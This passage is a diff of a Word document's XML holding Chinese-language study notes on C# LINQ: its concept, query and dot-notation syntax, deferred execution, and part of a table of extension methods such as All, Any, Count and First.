+        </w:rPr>
+        <w:t>概念：语言集成查询(Language Integrated Query,Linq)在C#中集成了查询语法，</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:color w:val="00B050"/>
+        </w:rPr>
+        <w:t>可以用相同的语法访问不同的数据源</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>。Linq提供了不同数据源的抽象层，所以可以使用相同的语法。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ad"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ad"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>并不是所有的查询都可以用Linq查询语法完成。也不是所有的拓展方法都映射到Linq查询子句上。</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:color w:val="0070C0"/>
+        </w:rPr>
+        <w:t>高级查询需要使用拓展方法。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ad"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ad"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>Linq有两种语法风格</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>：</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ad"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="7"/>
-        </w:numPr>
-        <w:ind w:left="450"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>Linq to sql / Linq to DataSet / Linq to Object / Linq to Xml</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl/>
+          <w:numId w:val="179"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>“</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:color w:val="0070C0"/>
+        </w:rPr>
+        <w:t>查询语法(Query Syntax)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>”</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>，这种语法格式类似于SQL查询</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ad"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="7"/>
-        </w:numPr>
-        <w:ind w:left="450"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>概念：语言集成查询</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>(Language Integrated Query,Linq)</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>在</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>C#</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>中集成了查询语法，</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:color w:val="FF0000"/>
-        </w:rPr>
-        <w:t>可以用相同的语法访问不同的数据源</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>。</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>Linq</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>提供了不同数据源的抽象层，所以可以使用相同的语法。</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="7"/>
-        </w:numPr>
-        <w:ind w:left="450"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>概念：</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>Linq</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>为</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>IEnumerable&lt;T&gt;</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>接口提供了各种拓展方法，以便用户在实现了该接口的任意集合上使用</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>Linq</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>查询。</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>(PS</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>：类似于</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>ArrayList,List,SortedList,Queue,Stack</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>等集合都实现了</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>IEnumerable</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>接口</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>.)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="7"/>
-        </w:numPr>
-        <w:ind w:left="450"/>
-      </w:pPr>
+          <w:numId w:val="179"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>“</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
           <w:color w:val="0070C0"/>
         </w:rPr>
-        <w:t>特性：在运行期间定义查询表达式时，查询就不会运行，查询会在迭代数据项时运行</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>。</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="7"/>
-        </w:numPr>
-        <w:ind w:left="450"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:color w:val="0070C0"/>
-        </w:rPr>
-        <w:t>特性：并不是所有的查询都可以用</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:color w:val="0070C0"/>
-        </w:rPr>
-        <w:t>Linq</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:color w:val="0070C0"/>
-        </w:rPr>
-        <w:t>查询语法完成。也不是所有的拓展方法都映射到</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:color w:val="0070C0"/>
-        </w:rPr>
-        <w:t>Linq</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:color w:val="0070C0"/>
-        </w:rPr>
-        <w:t>查询子句上。高级查询需要使用拓展方法。</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="7"/>
-        </w:numPr>
-        <w:ind w:left="450"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana" w:hint="eastAsia"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>语法格式：查询表达式必须以</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana" w:hint="eastAsia"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>from</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana" w:hint="eastAsia"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>开头，以</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana" w:hint="eastAsia"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>select</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana" w:hint="eastAsia"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>或</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana" w:hint="eastAsia"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>group</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana" w:hint="eastAsia"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>结束。在这两个子句中间可以使用</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana" w:hint="eastAsia"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>where</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana" w:hint="eastAsia"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>，</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana" w:hint="eastAsia"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>orderby</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana" w:hint="eastAsia"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana" w:hint="eastAsia"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>，</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana" w:hint="eastAsia"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>join</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana" w:hint="eastAsia"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>，</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana" w:hint="eastAsia"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>let</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana" w:hint="eastAsia"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>和其他</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana" w:hint="eastAsia"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>from</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana" w:hint="eastAsia"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>子句。</w:t>
-      </w:r>
+        <w:t>点语法(Dot-nontation Syntax)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>”，这种语法是基于拓展方法的。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="720"/>
+        </w:tabs>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ad"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>“查询语法”</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>的</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>格式：</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>查询表达式必须以from开头，以select或group结束。在这两个子句中间可以使用where，orderby，join，let和其他from子句。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ad"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>Linq有</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>的方法有延迟的特性，这个特性的效果是直到对结果进行遍历，才会执行该查询。</w:t>
+      </w:r>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblStyle w:val="a7"/>
+        <w:tblW w:w="0" w:type="auto"/>
+        <w:tblLook w:val="04A0"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="2096"/>
+        <w:gridCol w:w="7807"/>
+        <w:gridCol w:w="779"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2096" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ad"/>
+              <w:jc w:val="center"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>拓展方法</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="7807" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ad"/>
+              <w:jc w:val="center"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>描述</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="779" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ad"/>
+              <w:jc w:val="center"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>延迟</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2096" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ad"/>
+              <w:jc w:val="center"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>All</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="7807" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ad"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>如果数据源</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>的所有条目都与谓词匹配，则返回true</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="779" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ad"/>
+              <w:jc w:val="center"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>否</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2096" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ad"/>
+              <w:jc w:val="center"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>Any</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="7807" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ad"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>如果数据源至少有一个条目与谓词匹配，则返回true</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="779" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ad"/>
+              <w:jc w:val="center"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>否</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2096" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ad"/>
+              <w:jc w:val="center"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>Contains</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="7807" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ad"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>如果数据源包含指定的条目或值，返回true</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="779" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ad"/>
+              <w:jc w:val="center"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>否</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2096" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ad"/>
+              <w:jc w:val="center"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>Count</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="7807" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ad"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>返回数据源的条目数</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="779" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ad"/>
+              <w:jc w:val="center"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>否</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2096" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ad"/>
+              <w:jc w:val="center"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>First</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="7807" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ad"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>返回数据源的第一个条目</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="779" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ad"/>
+              <w:jc w:val="center"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>否</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2096" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ad"/>
+              <w:jc w:val="center"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>FirstOrDefault</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="7807" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ad"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>返回数据源的第一个条目，或无条目时，返回默认值</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="779" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ad"/>
+              <w:jc w:val="center"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>否</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2096" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ad"/>
+              <w:jc w:val="center"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
